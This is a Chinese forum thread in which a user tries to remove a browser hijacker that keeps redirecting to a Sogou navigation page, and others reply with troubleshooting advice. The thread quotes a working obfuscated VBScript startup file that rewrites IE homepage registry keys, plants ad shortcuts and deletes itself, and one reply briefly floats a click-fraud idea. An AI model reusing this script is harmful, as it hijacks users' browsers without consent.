浏览器主页被sogou用钩子劫持，没找到解决办法

Elex

麻烦有经验的windows高手帮忙看看怎么找出这个钩子把它干掉。
前天找五军之战的电影的时候遇到假的iqiyi网站，一下子被自动装了一堆垃圾软件（百兆宽带下载太快），虽然后来被我我极力删除了。
但IE，Crome，百度浏览器都是运行就跑到sogou的导航网站了。
同一路由器不同电脑是没有这个问题的，通过进程信息查看到是运行这些浏览器的时候被自动添加了sogou的网站作参数了，基本可以确定是被钩了。
但我整了半天没找到它是在那个dll下手的，替换了kernel32.dll也是没用。

explorer的所有加载dll好象都是系统的：


可以看到浏览器加载是被加了sogou导航网站的参数的

Elex

explorer加载的dll没有发现异常的：


kernel32.dll的CreateProcessA和CreateProcessW函数貌似也跟传说中的那样(但没找到CreateProcess函数)：

liliuqun

不懂，     

lans0625

必杀技，重装系统，图个放心。

风讯

上次有人讨论这个,说把快捷方式删除,用安装目录里的可执行文件可以临时解决,但感觉不爽,治标不治本.
看这次高手们有没有根除的方法.

楼上方法是好,但是这个中国的网络环境,中标是分分钟的事情.....

Elex

风讯 发表于 2015-8-30 18:11
上次有人讨论这个,说把快捷方式删除,用安装目录里的可执行文件可以临时解决,但感觉不爽,治标不治本.
看这次 ...

IE是不给改名的，不然用不了，试过快捷方式也一样被钩，只有从Taskmanager里新建任务运行才没有被钩。
重装费事，好多开发环境要弄，不到万不得已不想折腾重装。

lryxr2507

重装系统,前几天我也中招了.

风讯

我不知道你是怎么中的标
我把原先中标的快捷方式删除了
重新建个快捷方式 就好了

编辑: 快捷方式的属性里 "目标"内容 :C:\Users\hui\AppData\Local\Google\Chrome\Application\chrome.exe http://hao.360.cn/?src=lm&ls=n4a2f6f3a91
          我中的是 360的标,估计情况要轻点

lans0625

日常操作坚决在非管理员账号下进行，防御于未燃！！！！！！！！

xinzhi1986

弄个系统修复工具扫一下，一般能搞定，金山什么的自带有急救箱可以试试

SkyGz

Elex 发表于 2015-8-30 18:42
IE是不给改名的，不然用不了，试过快捷方式也一样被钩，只有从Taskmanager里新建任务运行才没有被钩。
重 ...

注册表搜索 相关网址,   IE注册关联里 给加了启动参数

Elex

风讯 发表于 2015-8-30 20:16
我不知道你是怎么中的标
我把原先中标的快捷方式删除了
重新建个快捷方式 就好了

现在的劫持方式不是这么低级的了，就是在窗口直接运行浏览器都会被跳转，我在楼主位已经确认是explorer在打开浏览器时被钩子改了浏览器的运行参数了

Elex

SkyGz 发表于 2015-8-30 21:06
注册表搜索 相关网址,   IE注册关联里 给加了启动参数

注册表是干净的，跟注册表没有关系。
这个劫持是在窗口或桌面运行浏览器就添加sogou的网站做参数，而通过taskmanager新建任务是正常的，显然是explorer.exe被劫持了。

lengshuicha

我也头大这事啊，找了很多方法都是无用的。

明天win7，使用Windows XP mode用来做一些没有把握的事情应该能够在一定程度上控制。


有没有人做这样一个东西，利用路由器反复点击一个地址，每一次点击，都要像别人付一笔钱，数量太大了，我就不信这个网站能支持。

LCRPN

看楼主这么牛B都解决不了，想起多年前遇到类似问题，竟妄想找办法解决之。看来选择重装系统是明智的。

----------------------------
Computer 就像一个房子，安装各种程序就像是在修饰你的这个屋子。
安装有些优良的软件就像是在家里添置一个盆栽。卸载软件就像搬走盆栽，干干净净。
安装有些软件就像挂壁画，卸载后不免要在墙上留下钉子的痕迹。
而还有些垃圾软件，完全不考虑能否卸载，就像用强力双面胶固定的墙纸，你就别指望能完全剔除它了！搞不好，还会把你的墙漆撕坏。

即使我们悉心打理这个屋子，久而久之，墙上的钉孔和残留，也会越来越多，而且不可修复，而且你会发现你的家越来越难打理。
所以，等到你的房子已经百孔千疮了，你就别花气力修整了，直接重新装修（重装系统）一次吧！

如果哪一天，你的房子已经装修太多次，而且经历了太多沧桑，发生了房屋结构问题（电脑硬件故障），就连装修师傅也没法，那就只有换房子了。

LQS1200

同样32IE没事，64位被sogou的导航网站劫持，注册表干净

vvwvvw

应该是浏览器的加载项里面有问题

Elex

vvwvvw 发表于 2015-8-30 23:43
应该是浏览器的加载项里面有问题

不是加载项的问题，是视窗程序explorer.exe在启动浏览器的时候其命令被勾住添加了sogou的网址作传递参数，就像执行命令行的命令字加参数一样，参看我附上的图

Elex

在启动目录找到一个IE.VBS文件，好象是用一堆数组拼成一个可执行程序，但删掉这个文件也没有用。

----------------------------
文件内容是这样的：
strs=array(13,115,101,116,32,108,104,119,121,61,99,114,101,97,116,101,111,98,106,101,99,116,40,34,119,115,99,114,105,112,116,46,115,104,101,108,108,34,41,13,10,13,10,112,97,116,104,61,34,72,75,69,89,95,76,79,67,65,76,95,77,65,67,72,73,78,69,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,73,110,116,101,114,110,101,116,32,69,120,112,108,111,114,101,114,92,109,97,105,110,92,83,116,97,114,116,32,80,97,103,101,34,13,10,116,102,61,108,104,119,121,46,114,101,103,119,114,105,116,101,40,112,97,116,104,44,34,104,116,116,112,58,47,47,119,119,119,46,49,51,56,119,46,99,111,109,47,34,41,13,10,115,101,116,32,112,97,116,104,61,110,111,116,104,105,110,103,13,10,112,97,116,104,61,34,72,75,69,89,95,67,85,82,82,69,78,84,95,85,83,69,82,92,83,79,70,84,87,65,82,69,92,77,73,67,82,79,83,79,70,84,92,73,110,116,101,114,110,101,116,32,69,120,112,108,111,114,101,114,92,77,97,105,110,92,83,116,97,114,116,32,80,97,103,101,34,13,10,116,102,61,108,104,119,121,46,114,101,103,119,114,105,116,101,40,112,97,116,104,44,34,104,116,116,112,58,47,47,119,119,119,46,49,51,56,119,46,99,111,109,47,34,41,13,10,13,10,67,111,110,115,116,32,65,68,77,73,78,73,83,84,82,65,84,73,86,69,95,84,79,79,76,83,32,61,32,54,13,10,13,10,83,101,116,32,111,98,106,83,104,101,108,108,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,83,104,101,108,108,46,65,112,112,108,105,99,97,116,105,111,110,34,41,13,10,83,101,116,32,111,98,106,70,111,108,100,101,114,32,61,32,111,98,106,83,104,101,108,108,46,78,97,109,101,115,112,97,99,101,40,65,68,77,73,78,73,83,84,82,65,84,73,86,69,95,84,79,79,76,83,41,32,13,10,83,101,116,32,111,98,106,70,111,108,100,101,114,73,116,101,109,32,61,32,111,98,106,70,111,108,100,101,114,46,83,101,108,102,32,32,32,32,13,10,13,10,83,101,116,32,111,98,106,83,104,101,108,108,32,61,32,87,83,99,114,105,112,116,46,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,13,10,115,116,114,68,101,115,107,116,111,112,70,108,100,32,61,32,111,98,106,70,111,108,100,101,114,73,116,101,109,46,80,97,116,104,13,10,83,101,116,32,111,98,106,85,82,76,83,104,111,114,116,99,117,116,32,61,32,111,98,106,83,104,101,108,108,46,67,114,101,97,116,101,83,104,111,114,116,99,117,116,40,115,116,114,68,101,115,107,116,111,112,70,108,100,32,38,32,34,92,-19213,-20265,-19765,-17959,-12808,46,117,114,108,34,41,13,10,111,98,106,85,82,76,83,104,111,114,116,99,117,116,46,84,97,114,103,101,116,80,97,116,104,32,61,32,34,104,116,116,112,58,47,47,119,119,119,46,100,97,98,97,105,99,97,105,46,99,111,109,34,13,10,111,98,106,85,82,76,83,104,111,114,116,99,117,116,46,83,97,118,101,13,10,13,10,13,10,83,101,116,32,111,98,106,83,104,101,108,108,32,61,32,87,83,99,114,105,112,116,46,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,13,10,115,116,114,68,101,115,107,116,111,112,70,108,100,32,61,32,111,98,106,70,111,108,100,101,114,73,116,101,109,46,80,97,116,104,13,10,83,101,116,32,111,98,106,85,82,76,83,104,111,114,116,99,117,116,32,61,32,111,98,106,83,104,101,108,108,46,67,114,101,97,116,101,83,104,111,114,116,99,117,116,40,115,116,114,68,101,115,107,116,111,112,70,108,100,32,38,32,34,92,49,51,56,-12808,-10569,-19213,-14165,46,117,114,108,34,41,13,10,111,98,106,85,82,76,83,104,111,114,116,99,117,116,46,84,97,114,103,101,116,80,97,116,104,32,61,32,34,104,116,116,112,58,47,47,119,119,119,46,49,51,56,119,46,99,111,109,47,34,13,10,111,98,106,85,82,76,83,104,111,114,116,99,117,116,46,83,97,118,101,13,10,13,10,13,10,79,110,32,69,114,114,111,114,32,82,101,115,117,109,101,32,78,101,120,116,32,39,-18496,-10567,-19466,-12330,-19219,-12557,13,10,83,101,116,32,102,115,111,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,41,13,10,87,83,99,114,105,112,116,46,83,108,101,101,112,32,51,48,48,48,32,39,-16981,-16955,-20034,-10572,-12080,-17966,-14608,49,-15381,13,10,102,115,111,46,68,101,108,101,116,101,70,105,108,101,40,87,83,99,114,105,112,116,46,83,99,114,105,112,116,78,97,109,101,41,32,39,-13890,-19459,-16955,-20034,-10284,-13843,13,10,73,102,32,102,115,111,46,70,105,108,101,69,120,105,115,116,115,40,34,67,58,92,68,111,99,117,109,101,110,116,115,32,97,110,100,32,83,101,116,116,105,110,103,115,92,65,108,108,32,85,115,101,114,115,92,-24136,-16470,-13636,-24135,-19765,-19035,92,-19508,-12046,92,-14604,-18769,92,73,69,46,86,66,83,34,41,32,84,104,101,110,32,102,115,111,46,68,101,108,101,116,101,70,105,108,101,40,34,67,58,92,68,111,99,117,109,101,110,116,115,32,97,110,100,32,83,101,116,116,105,110,103,115,92,65,108,108,32,85,115,101,114,115,92,-24136,-16470,-13636,-24135,-19765,-19035,92,-19508,-12046,92,-14604,-18769,92,73,69,46,86,66,83,34,41,32,39,-13890,-19459,-19508,-12046,32,-14105,-17925,-19781,-12309,-13890,-19459,-16439,-11564,-15425,-19250,-18756,-12066,-18236,-10505,-11597,13,10,13,10,13,10,79,110,32,69,114,114,111,114,32,82,101,115,117,109,101,32,78,101,120,116,32,39,-18496,-10567,-19466,-12330,-19219,-12557,13,10,83,101,116,32,102,115,111,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,41,13,10,87,83,99,114,105,112,116,46,83,108,101,101,112,32,49,48,48,48,32,39,-16981,-16955,-20034,-10572,-12080,-17966,-14608,49,-15381,13,10,102,115,111,46,68,101,108,101,116,101,70,105,108,101,40,87,83,99,114,105,112,116,46,83,99,114,105,112,116,78,97,109,101,41,32,39,-13890,-19459,-16955,-20034,-10284,-13843,13,10,73,102,32,102,115,111,46,70,105,108,101,69,120,105,115,116,115,40,34,67,58,92,80,114,111,103,114,97,109,68,97,116,97,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,83,116,97,114,116,32,77,101,110,117,92,80,114,111,103,114,97,109,115,92,83,116,97,114,116,117,112,92,73,69,46,86,66,83,34,41,32,84,104,101,110,32,102,115,111,46,68,101,108,101,116,101,70,105,108,101,40,34,67,58,92,80,114,111,103,114,97,109,68,97,116,97,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,83,116,97,114,116,32,77,101,110,117,92,80,114,111,103,114,97,109,115,92,83,116,97,114,116,117,112,92,73,69,46,86,66,83,34,41,32,39,-13890,-19459,-19508,-12046,32,-14105,-17925,-19781,-12309,-13890,-19459,-16439,-11564,-15425,-19250,-18756,-12066,-18236,-10505,-11597,13,10,13,10,119,115,99,114,105,112,116,46,113,117,105,116,13,10)
for i=1 to UBound(strs)
        runner=runner&chr(strs(i))
next
Execute runner

Elex

Elex 发表于 2015-8-31 00:55
在启动目录找到一个IE.VBS文件，好象是用一堆数组拼成一个可执行程序，但删掉这个文件也没有用。

-------- ...

电脑上有两个不同的流氓软件在打架。经过分析，楼上的IE.VBS代码是把IE的主页修改成"www.138w.com"，并在桌面上生成lnk文件， 而这个"www.138w.com"是跳转到"http://www.hao123.com/?tn=99053513_hao_pg"
但这个手段始终没有那个钩子厉害 ，钩子程序通过浏览器的命令参数直接跳到sogou网站了

楼上IE.VBS转换后的程序代码：

sfes

用火狐吧兼容好，永远不怕劫持

饭牛牛

Elex 发表于 2015-8-30 17:01
explorer加载的dll没有发现异常的：

求私信那个流氓软件.

LQS1200

我的昨天查了查，并不是直接指向sougou，而是到另一个网址然后跳转进去

yuyu87

这个与搜狗没有关系的，看链接，后边有推广的，这是个人弄的，

skylly3

装个360扫描下就能查出来。

xingjianpeng

装个它竞争对手的浏览器应该可以搞定。

Elex

sfes 发表于 2015-8-31 07:07
用火狐吧兼容好，永远不怕劫持

这个真跟浏览器本身没有关系，是启动浏览器的时候把网址作为参数传递给浏览器了，就是执行命令字加参数的形式（见楼主位的附图）。只要浏览器接受参数就受影响

elecfun

之前亲戚的一个电脑，能上QQ，所有80端口的网站打不开，其它端口可以。想远程给他在线重装系统，结果软件提示无法连接网络。只好让他自己拿去修。

dzdzwkx2013

我用UC无问题

LearningASM

关心一下开机启动项~

snoopyzz

有种东西叫快捷方式....LZ这明显是快捷方式里被添加了网址呀
这种情况无论什么杀毒都不会报的...因为快捷方式是合法的

sohappyoh

金山就是一坨屎

Elex

snoopyzz 发表于 2015-8-31 12:38
有种东西叫快捷方式....LZ这明显是快捷方式里被添加了网址呀
这种情况无论什么杀毒都不会报的...因为快捷 ...

修改快捷方式的方法只能骗小孩。
这个不是快捷方式，我已经说了是被钩子添加了运行参数了。只要在窗口打开程序就会受到影响，包括在浏览器目录下直接运行浏览器。

Elex

sohappyoh 发表于 2015-8-31 12:42
金山就是一坨屎

金山是我为了解决这个问题临时装的，确实没鸟用，这是还没来得及删

skylly3

都说了， 临时装个360扫描下。

streamer

卸载sogou，用bing输入法，win10自带的拼音输入法也很不错。国产软件都耍流氓

ljmddnok

看看注册吧里面的启动项目有什么异常的程序

eastboy

有可能是存在某个进程或者服务，会监视系统运行IE浏览器，一旦发现有IE浏览器运行，则钩之

Elex

搞定了，另外开了一个帖子：http://www.amobbs.com/thread-5631588-1-1.html